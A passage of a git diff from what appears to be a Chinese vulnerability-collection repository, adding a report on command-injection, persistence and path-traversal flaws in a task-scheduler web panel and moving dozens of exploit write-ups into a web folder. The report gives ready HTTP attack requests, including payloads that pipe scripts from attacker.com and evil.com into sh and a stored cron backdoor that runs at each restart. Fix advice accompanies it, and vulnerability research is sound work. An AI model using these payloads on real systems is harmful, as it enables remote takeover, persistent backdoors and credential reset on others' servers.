+if (info.pythonMirror) { + cmd = `pip3 config set global.index-url ${info.pythonMirror}`; +} +await promiseExec(cmd); // ← 传入 "https://pypi.org/simple; id > /tmp/py_proof" 将导致注入 +``` + +**2. Node 镜像注入 (`updateNodeMirror`) L149-195** +```typescript +let cmd = 'pnpm config delete registry'; +if (info.nodeMirror) { + cmd = `pnpm config set registry ${info.nodeMirror}`; +} +let command = `cd && ${cmd}`; +// ... 之后交由 scheduleService.runTask(command, ...) 执行 +``` +`runTask` 最终调用 `spawn(command, { shell: '/bin/bash' })` 触发注入。 + +**3. 
Linux 软件源注入 (`updateLinuxMirror`) L211-271** +```typescript +const command = `sed -i 's/${defaultDomain.replace(/\//g,'\\/')}/${targetDomain.replace(/\//g,'\\/')}/g' /etc/apk/repositories && apk update -f`; +// ... 交由 scheduleService.runTask 执行 +``` +这里 `$targetDomain` (`info.linuxMirror`) 被注入到了 `sed` 命令中,如果传入 `https://dl-cdn.alpinelinux.org'; id > /tmp/linux_proof; #` 即可逃逸单引号并执行。 + +**4. 停止命令(grep注入)(`api/system.ts`) L302-319** +调用 `PUT /API/system/command-stop`,其最终调用 `getPid(command)` +```typescript +// back/config/util.ts L414 +const taskCommand = `ps -eo pid,command | grep "${cmd}" | grep -v grep ...`; +``` +这与前面分析的依赖取消(`cancel`)逻辑相似,命令被嵌入双引号内执行,发生二次注入。 + +**测试报文**: +```http +PUT /API/system/config/python-mirror HTTP/1.1 +Content-Type: application/json + +{"pythonMirror": "x; id > /tmp/py_proof; #"} +``` +→ 确认 RCE ✅ + +--- + +### 3.6 QL-2026-011: 启动持久化 Persistence RCE — ✅ 高危 + +**漏洞根因**: 系统在启动时(`loaders/initData.ts`),为了恢复状态,会从数据库加载特定的定时任务,并直接调用原生 `exec` 函数去执行。这意味着如果我们能通过绕过认证写入恶意的定时任务,不仅可以主动触发执行,也能实现持久化的启动项劫持(Persistence)。 + +#### 数据流总览 + +``` +① 系统启动(Container Restart / Crash Recovery) + │ + ▼ +② loaders/initData.ts L22 默认导出加载函数执行 + │ + ▼ +③ loaders/initData.ts L137 CrontabModel.findAll(...) 查找条件包含 `ql repo` 或 `ql raw` + │ + ▼ +④ loaders/initData.ts L149 exec(doc.command) + ^^^^^^^^^^^^^^^^^ + 直接将查出的恶意命令传给 child_process.exec! 
+``` + +#### 逐步详解 + +**① 创建恶意定时任务** +攻击者通过未授权接口 (`POST /API/crons`) 创建一个恶意任务。为了匹配启动加载时的条件,该命令必须包含 `ql repo` 或 `ql raw` 字符串。 + +```http +POST /API/crons HTTP/1.1 +Content-Type: application/json + +{ + "name": "persistence_rce_test", + "command": "ql repo; curl http://attacker.com/backdoor | sh", + "schedule": "0 0 1 1 *" +} +``` + +**② 数据库记录** +定时任务的指令字符串会被原样存储入 SQLite。 + +**③ 启动触发执行 (`loaders/initData.ts` L137-153)** +当 Docker 容器发生重启,系统启动时: +```typescript +CrontabModel.findAll({ + where: { + isDisabled: { [Op.ne]: 1 }, + command: { + [Op.or]: [{ [Op.like]: `%ql repo%` }, { [Op.like]: `%ql raw%` }], + }, + }, +}).then((docs) => { + for (let i = 0; i < docs.length; i++) { + const doc = docs[i]; + if (doc) { + exec(doc.command); // ← 未经检查直接执行 + } + } +}); +``` + +**影响**: 该漏洞构建了完整的系统后门和持久化控制。无论管理员如何清理正在运行的恶意进程,只要未从数据库中清除这条恶意计划任务,每次容器重启时,恶意 Payload 就会随系统服务一同以 root 权限自动启动。 + +--- + +### 3.7 基础漏洞分析(路径穿越与文件操作) + +#### QL-2026-002: 黑名单绕过(缺少 return) +`back/api/config.ts` L76 在黑名单拦截后缺少 `return`,写入流程继续。可覆写 `auth.json`(管理员账号)。 + +#### QL-2026-003: 路径穿越 (../../../../) +`name` 参数无过滤。`../../../../tmp/traversal_proof.txt` 可成功写入容器系统级 `/tmp`。 + +#### QL-2026-004: config.sh 未列入黑名单 +`config.sh` 在每次任务执行前被 `source` 加载。由于未加入黑名单,攻击者可直接写入该文件获取持久 RCE。 + +--- + +## 四、攻击链总结与 HTTP 测试报文 + +### 攻击链 A:最速一步 RCE (大小写绕过) + +```http +PUT /API/system/command-run HTTP/1.1 +Host: target:5700 +Content-Type: application/json + +{"command": "id > /tmp/rce_proof.txt"} +``` + +### 攻击链 B:依赖注入 RCE (大小写绕过 + 二次注入) + +```http +POST /API/dependencies HTTP/1.1 +Content-Type: application/json + +[{"name": "$(curl -fsSL https://evil.com/sh | sh)", "type": 0}] +``` + +### 攻击链 C:凭据重置 RCE (初始化绕过) + +```http +PUT /open/user/init HTTP/1.1 +Content-Type: application/json + +{"username": "attacker", "password": "attacker123"} +``` + +--- + +## 五、修复建议 (P0 优先级) + +1. **统一认证层**: 将 Init Guard 移至 URL Rewrite 之后。Express Router 设置 `caseSensitive: true`。认证正则强制不区分大小写。 +2. 
**彻底禁用 Shell**: 移除所有 `spawn(..., {shell: true})` 和 `exec()`。必须使用 `spawn(cmd, [args])` 参数数组形式。 +3. **严格参数过滤**: 对包名、镜像 URL、Cron 命令等参数实施白名单正则校验 `^[a-zA-Z0-9@/_.-]+$`。 +4. **文件访问控制**: 完善 `blackFileList`,在 `res.send()` 后强制 `return`。实施基于真实路径 (`realpath`) 的目录逃逸校验。 + +--- + +## 六、复现环境与 PoC + +所有漏洞均已集成在 `tmp/poc_test.py` 中。 + +```bash +cd tmp/ +.venv/bin/python3 poc_test.py # 15/15 全部通过 +``` diff --git a/scripts/update_readme.py b/scripts/update_readme.py index 7e14f1130..ae97ce3af 100644 --- a/scripts/update_readme.py +++ b/scripts/update_readme.py @@ -18,7 +18,7 @@ WEB_KEYWORDS = [ 'rce', 'sql', 'xss', 'csrf', 'upload', 'injection', 'web', 'cms', '文件上传', '文件读取', 'sql注入', '信息泄露', '命令执行', - '目录遍历', '目录穿越', 'xxe', 'bypass', 'auth' + '目录遍历', '目录穿越', 'xxe', 'bypass', 'auth', '漏洞' ] START_MARKER_REGEX = r'id="head4">Web APP' diff --git a/Apache Solr RCE via Velocity Template Injection.md b/web/Apache Solr RCE via Velocity Template Injection.md similarity index 100% rename from Apache Solr RCE via Velocity Template Injection.md rename to web/Apache Solr RCE via Velocity Template Injection.md diff --git "a/CVE-2019-10173 Xstream 1.4.10\347\211\210\346\234\254\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/web/CVE-2019-10173 Xstream 1.4.10\347\211\210\346\234\254\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" similarity index 100% rename from "CVE-2019-10173 Xstream 1.4.10\347\211\210\346\234\254\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" rename to "web/CVE-2019-10173 Xstream 1.4.10\347\211\210\346\234\254\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" 
diff --git "a/CVE-2019-15107 Webmin 1.920 \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/web/CVE-2019-15107 Webmin 1.920 \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" similarity index 100% rename from "CVE-2019-15107 Webmin 1.920 \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" rename to "web/CVE-2019-15107 Webmin 1.920 \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" diff --git "a/CVE-2019-16131 OKLite v1.2.25 \344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" "b/web/CVE-2019-16131 OKLite v1.2.25 \344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" similarity index 100% rename from "CVE-2019-16131 OKLite v1.2.25 \344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" rename to "web/CVE-2019-16131 OKLite v1.2.25 \344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" diff --git "a/CVE-2019-16132 OKLite v1.2.25 \345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\345\210\240\351\231\244\346\274\217\346\264\236.md" "b/web/CVE-2019-16132 OKLite v1.2.25 \345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\345\210\240\351\231\244\346\274\217\346\264\236.md" similarity index 100% rename from "CVE-2019-16132 OKLite v1.2.25 \345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\345\210\240\351\231\244\346\274\217\346\264\236.md" rename to "web/CVE-2019-16132 OKLite v1.2.25 \345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\345\210\240\351\231\244\346\274\217\346\264\236.md" 
diff --git a/CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md b/web/CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md similarity index 100% rename from CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md rename to web/CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md diff --git "a/CVE-2019-16309 FlameCMS 3.3.5 \345\220\216\345\217\260\347\231\273\345\275\225\345\244\204\345\255\230\345\234\250sql\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/web/CVE-2019-16309 FlameCMS 3.3.5 \345\220\216\345\217\260\347\231\273\345\275\225\345\244\204\345\255\230\345\234\250sql\346\263\250\345\205\245\346\274\217\346\264\236.md" similarity index 100% rename from "CVE-2019-16309 FlameCMS 3.3.5 \345\220\216\345\217\260\347\231\273\345\275\225\345\244\204\345\255\230\345\234\250sql\346\263\250\345\205\245\346\274\217\346\264\236.md" rename to "web/CVE-2019-16309 FlameCMS 3.3.5 \345\220\216\345\217\260\347\231\273\345\275\225\345\244\204\345\255\230\345\234\250sql\346\263\250\345\205\245\346\274\217\346\264\236.md" diff --git "a/CVE-2019-16314 indexhibit cms v2.1.5 \345\255\230\345\234\250\351\207\215\350\243\205\345\271\266\345\257\274\350\207\264getshell.md" "b/web/CVE-2019-16314 indexhibit cms v2.1.5 \345\255\230\345\234\250\351\207\215\350\243\205\345\271\266\345\257\274\350\207\264getshell.md" similarity index 100% rename from "CVE-2019-16314 indexhibit cms v2.1.5 \345\255\230\345\234\250\351\207\215\350\243\205\345\271\266\345\257\274\350\207\264getshell.md" rename to "web/CVE-2019-16314 indexhibit cms v2.1.5 \345\255\230\345\234\250\351\207\215\350\243\205\345\271\266\345\257\274\350\207\264getshell.md" diff --git a/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md b/web/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md similarity index 100% rename from CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md rename to web/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md 
diff --git a/CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md b/web/CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md similarity index 100% rename from CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md rename to web/CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md diff --git "a/CVE-2019-2890-Oracle WebLogic \345\217\215\345\272\217\345\210\227\345\214\226\344\270\245\351\207\215\346\274\217\346\264\236.md" "b/web/CVE-2019-2890-Oracle WebLogic \345\217\215\345\272\217\345\210\227\345\214\226\344\270\245\351\207\215\346\274\217\346\264\236.md" similarity index 100% rename from "CVE-2019-2890-Oracle WebLogic \345\217\215\345\272\217\345\210\227\345\214\226\344\270\245\351\207\215\346\274\217\346\264\236.md" rename to "web/CVE-2019-2890-Oracle WebLogic \345\217\215\345\272\217\345\210\227\345\214\226\344\270\245\351\207\215\346\274\217\346\264\236.md" diff --git "a/CVE-2019-7580 thinkcmf-5.0.190111\345\220\216\345\217\260\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\345\257\274\350\207\264\347\232\204\344\273\243\347\240\201\346\211\247\350\241\214.md" "b/web/CVE-2019-7580 thinkcmf-5.0.190111\345\220\216\345\217\260\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\345\257\274\350\207\264\347\232\204\344\273\243\347\240\201\346\211\247\350\241\214.md" similarity index 100% rename from "CVE-2019-7580 thinkcmf-5.0.190111\345\220\216\345\217\260\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\345\257\274\350\207\264\347\232\204\344\273\243\347\240\201\346\211\247\350\241\214.md" rename to "web/CVE-2019-7580 thinkcmf-5.0.190111\345\220\216\345\217\260\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\345\257\274\350\207\264\347\232\204\344\273\243\347\240\201\346\211\247\350\241\214.md" 
diff --git "a/CVE-2019-7609-kibana\344\275\216\344\272\2166.6.0\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\345\221\275\344\273\244\346\211\247\350\241\214.md" "b/web/CVE-2019-7609-kibana\344\275\216\344\272\2166.6.0\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\345\221\275\344\273\244\346\211\247\350\241\214.md" similarity index 100% rename from "CVE-2019-7609-kibana\344\275\216\344\272\2166.6.0\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\345\221\275\344\273\244\346\211\247\350\241\214.md" rename to "web/CVE-2019-7609-kibana\344\275\216\344\272\2166.6.0\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\345\221\275\344\273\244\346\211\247\350\241\214.md" diff --git "a/CVE-2020-0554\357\274\232phpMyAdmin\345\220\216\345\217\260SQL\346\263\250\345\205\245.md" "b/web/CVE-2020-0554\357\274\232phpMyAdmin\345\220\216\345\217\260SQL\346\263\250\345\205\245.md" similarity index 100% rename from "CVE-2020-0554\357\274\232phpMyAdmin\345\220\216\345\217\260SQL\346\263\250\345\205\245.md" rename to "web/CVE-2020-0554\357\274\232phpMyAdmin\345\220\216\345\217\260SQL\346\263\250\345\205\245.md" diff --git "a/CVE-2020-3452\357\274\232Cisco_ASAFTD\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" "b/web/CVE-2020-3452\357\274\232Cisco_ASAFTD\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" similarity index 100% rename from "CVE-2020-3452\357\274\232Cisco_ASAFTD\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" rename to "web/CVE-2020-3452\357\274\232Cisco_ASAFTD\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" 
diff --git "a/CVE-2020-8794-OpenSMTPD \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/web/CVE-2020-8794-OpenSMTPD \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" similarity index 100% rename from "CVE-2020-8794-OpenSMTPD \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" rename to "web/CVE-2020-8794-OpenSMTPD \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" diff --git a/CVE-2020-8813 - Cacti v1.2.8 RCE.md b/web/CVE-2020-8813 - Cacti v1.2.8 RCE.md similarity index 100% rename from CVE-2020-8813 - Cacti v1.2.8 RCE.md rename to web/CVE-2020-8813 - Cacti v1.2.8 RCE.md diff --git "a/Cobub Razor 0.7.2\345\255\230\345\234\250\350\267\250\347\253\231\350\257\267\346\261\202\344\274\252\351\200\240\346\274\217\346\264\236.md" "b/web/Cobub Razor 0.7.2\345\255\230\345\234\250\350\267\250\347\253\231\350\257\267\346\261\202\344\274\252\351\200\240\346\274\217\346\264\236.md" similarity index 100% rename from "Cobub Razor 0.7.2\345\255\230\345\234\250\350\267\250\347\253\231\350\257\267\346\261\202\344\274\252\351\200\240\346\274\217\346\264\236.md" rename to "web/Cobub Razor 0.7.2\345\255\230\345\234\250\350\267\250\347\253\231\350\257\267\346\261\202\344\274\252\351\200\240\346\274\217\346\264\236.md" 
diff --git "a/Cobub Razor 0.7.2\350\266\212\346\235\203\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/web/Cobub Razor 0.7.2\350\266\212\346\235\203\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" similarity index 100% rename from "Cobub Razor 0.7.2\350\266\212\346\235\203\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" rename to "web/Cobub Razor 0.7.2\350\266\212\346\235\203\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" diff --git "a/Cobub Razor 0.8.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/web/Cobub Razor 0.8.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" similarity index 100% rename from "Cobub Razor 0.8.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" rename to "web/Cobub Razor 0.8.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" diff --git "a/Cobub Razor 0.8.0\345\255\230\345\234\250\347\211\251\347\220\206\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" "b/web/Cobub Razor 0.8.0\345\255\230\345\234\250\347\211\251\347\220\206\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" similarity index 100% rename from "Cobub Razor 0.8.0\345\255\230\345\234\250\347\211\251\347\220\206\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" rename to "web/Cobub Razor 0.8.0\345\255\230\345\234\250\347\211\251\347\220\206\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" 
diff --git "a/Couch through 2.0\345\255\230\345\234\250\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" "b/web/Couch through 2.0\345\255\230\345\234\250\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" similarity index 100% rename from "Couch through 2.0\345\255\230\345\234\250\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" rename to "web/Couch through 2.0\345\255\230\345\234\250\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" diff --git "a/DomainMod\347\232\204XSS\351\233\206\345\220\210.md" "b/web/DomainMod\347\232\204XSS\351\233\206\345\220\210.md" similarity index 100% rename from "DomainMod\347\232\204XSS\351\233\206\345\220\210.md" rename to "web/DomainMod\347\232\204XSS\351\233\206\345\220\210.md" diff --git "a/Easy File Sharing Web Server 7.2 - GET \347\274\223\345\206\262\345\214\272\346\272\242\345\207\272 (SEH).md" "b/web/Easy File Sharing Web Server 7.2 - GET \347\274\223\345\206\262\345\214\272\346\272\242\345\207\272 (SEH).md" similarity index 100% rename from "Easy File Sharing Web Server 7.2 - GET \347\274\223\345\206\262\345\214\272\346\272\242\345\207\272 (SEH).md" rename to "web/Easy File Sharing Web Server 7.2 - GET \347\274\223\345\206\262\345\214\272\346\272\242\345\207\272 (SEH).md" diff --git "a/FineCMS_v5.0.8\344\270\244\345\244\204getshell.md" "b/web/FineCMS_v5.0.8\344\270\244\345\244\204getshell.md" similarity index 100% rename from "FineCMS_v5.0.8\344\270\244\345\244\204getshell.md" rename to "web/FineCMS_v5.0.8\344\270\244\345\244\204getshell.md" 
diff --git "a/Finecms_v5.4\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\344\277\256\346\224\271\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267\345\257\206\347\240\201.md" "b/web/Finecms_v5.4\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\344\277\256\346\224\271\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267\345\257\206\347\240\201.md" similarity index 100% rename from "Finecms_v5.4\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\344\277\256\346\224\271\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267\345\257\206\347\240\201.md" rename to "web/Finecms_v5.4\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\344\277\256\346\224\271\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267\345\257\206\347\240\201.md" diff --git "a/GreenCMS v2.3.0603\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\350\216\267\345\217\226webshell&\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/web/GreenCMS v2.3.0603\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\350\216\267\345\217\226webshell&\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" similarity index 100% rename from "GreenCMS v2.3.0603\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\350\216\267\345\217\226webshell&\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" rename to "web/GreenCMS v2.3.0603\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\350\216\267\345\217\226webshell&\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" 
diff --git "a/Hucart cms v5.7.4 CSRF\346\274\217\346\264\236\345\217\257\344\273\273\346\204\217\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\345\217\267.md" "b/web/Hucart cms v5.7.4 CSRF\346\274\217\346\264\236\345\217\257\344\273\273\346\204\217\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\345\217\267.md" similarity index 100% rename from "Hucart cms v5.7.4 CSRF\346\274\217\346\264\236\345\217\257\344\273\273\346\204\217\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\345\217\267.md" rename to "web/Hucart cms v5.7.4 CSRF\346\274\217\346\264\236\345\217\257\344\273\273\346\204\217\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\345\217\267.md" diff --git a/Joomla-3.4.6-RCE.md b/web/Joomla-3.4.6-RCE.md similarity index 100% rename from Joomla-3.4.6-RCE.md rename to web/Joomla-3.4.6-RCE.md 
diff --git "a/LFCMS 3.7.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\346\267\273\345\212\240\344\273\273\346\204\217\347\224\250\346\210\267\350\264\246\346\210\267\346\210\226\344\273\273\346\204\217\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/web/LFCMS 3.7.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\346\267\273\345\212\240\344\273\273\346\204\217\347\224\250\346\210\267\350\264\246\346\210\267\346\210\226\344\273\273\346\204\217\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" similarity index 100% rename from "LFCMS 3.7.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\346\267\273\345\212\240\344\273\273\346\204\217\347\224\250\346\210\267\350\264\246\346\210\267\346\210\226\344\273\273\346\204\217\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" rename to "web/LFCMS 3.7.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\346\267\273\345\212\240\344\273\273\346\204\217\347\224\250\346\210\267\350\264\246\346\210\267\346\210\226\344\273\273\346\204\217\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" diff --git "a/MetInfoCMS 5.X\347\211\210\346\234\254GETSHELL\346\274\217\346\264\236\345\220\210\351\233\206.md" "b/web/MetInfoCMS 5.X\347\211\210\346\234\254GETSHELL\346\274\217\346\264\236\345\220\210\351\233\206.md" similarity index 100% rename from "MetInfoCMS 5.X\347\211\210\346\234\254GETSHELL\346\274\217\346\264\236\345\220\210\351\233\206.md" rename to "web/MetInfoCMS 5.X\347\211\210\346\234\254GETSHELL\346\274\217\346\264\236\345\220\210\351\233\206.md" 
diff --git "a/Metinfo-6.1.2\347\211\210\346\234\254\345\255\230\345\234\250XSS\346\274\217\346\264\236&SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/web/Metinfo-6.1.2\347\211\210\346\234\254\345\255\230\345\234\250XSS\346\274\217\346\264\236&SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" similarity index 100% rename from "Metinfo-6.1.2\347\211\210\346\234\254\345\255\230\345\234\250XSS\346\274\217\346\264\236&SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" rename to "web/Metinfo-6.1.2\347\211\210\346\234\254\345\255\230\345\234\250XSS\346\274\217\346\264\236&SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" diff --git "a/MiniCMS 1.10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/web/MiniCMS 1.10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" similarity index 100% rename from "MiniCMS 1.10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" rename to "web/MiniCMS 1.10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" diff --git "a/S-CMS PHP v3.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/web/S-CMS PHP v3.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" similarity index 100% rename from "S-CMS PHP v3.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" rename to "web/S-CMS PHP v3.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" 
diff --git "a/S-CMS\344\274\201\344\270\232\345\273\272\347\253\231\347\263\273\347\273\237PHP\347\211\210v3.0\345\220\216\345\217\260\345\255\230\345\234\250CSRF\345\217\257\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\346\235\203\351\231\220\350\264\246\345\217\267.md" "b/web/S-CMS\344\274\201\344\270\232\345\273\272\347\253\231\347\263\273\347\273\237PHP\347\211\210v3.0\345\220\216\345\217\260\345\255\230\345\234\250CSRF\345\217\257\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\346\235\203\351\231\220\350\264\246\345\217\267.md" similarity index 100% rename from "S-CMS\344\274\201\344\270\232\345\273\272\347\253\231\347\263\273\347\273\237PHP\347\211\210v3.0\345\220\216\345\217\260\345\255\230\345\234\250CSRF\345\217\257\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\346\235\203\351\231\220\350\264\246\345\217\267.md" rename to "web/S-CMS\344\274\201\344\270\232\345\273\272\347\253\231\347\263\273\347\273\237PHP\347\211\210v3.0\345\220\216\345\217\260\345\255\230\345\234\250CSRF\345\217\257\346\267\273\345\212\240\347\256\241\347\220\206\345\221\230\346\235\203\351\231\220\350\264\246\345\217\267.md" diff --git "a/ThinkCMF\346\274\217\346\264\236\345\205\250\351\233\206\345\222\214.md" "b/web/ThinkCMF\346\274\217\346\264\236\345\205\250\351\233\206\345\222\214.md" similarity index 100% rename from "ThinkCMF\346\274\217\346\264\236\345\205\250\351\233\206\345\222\214.md" rename to "web/ThinkCMF\346\274\217\346\264\236\345\205\250\351\233\206\345\222\214.md" diff --git "a/WDJACMS1.5.2\346\250\241\346\235\277\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/web/WDJACMS1.5.2\346\250\241\346\235\277\346\263\250\345\205\245\346\274\217\346\264\236.md" similarity index 100% rename from "WDJACMS1.5.2\346\250\241\346\235\277\346\263\250\345\205\245\346\274\217\346\264\236.md" rename to "web/WDJACMS1.5.2\346\250\241\346\235\277\346\263\250\345\205\245\346\274\217\346\264\236.md" 
diff --git "a/YzmCMS 3.6\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" "b/web/YzmCMS 3.6\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" similarity index 100% rename from "YzmCMS 3.6\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" rename to "web/YzmCMS 3.6\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" diff --git "a/Z-Blog 1.5.1.1740\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" "b/web/Z-Blog 1.5.1.1740\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" similarity index 100% rename from "Z-Blog 1.5.1.1740\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" rename to "web/Z-Blog 1.5.1.1740\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" diff --git a/ZZCMS201910 SQL Injections.md b/web/ZZCMS201910 SQL Injections.md similarity index 100% rename from ZZCMS201910 SQL Injections.md rename to web/ZZCMS201910 SQL Injections.md diff --git "a/Zblog\351\273\230\350\256\244Theme_csrf+\345\202\250\345\255\230xss+getshell.md" "b/web/Zblog\351\273\230\350\256\244Theme_csrf+\345\202\250\345\255\230xss+getshell.md" similarity index 100% rename from "Zblog\351\273\230\350\256\244Theme_csrf+\345\202\250\345\255\230xss+getshell.md" rename to "web/Zblog\351\273\230\350\256\244Theme_csrf+\345\202\250\345\255\230xss+getshell.md" diff --git "a/cve-2019-17424 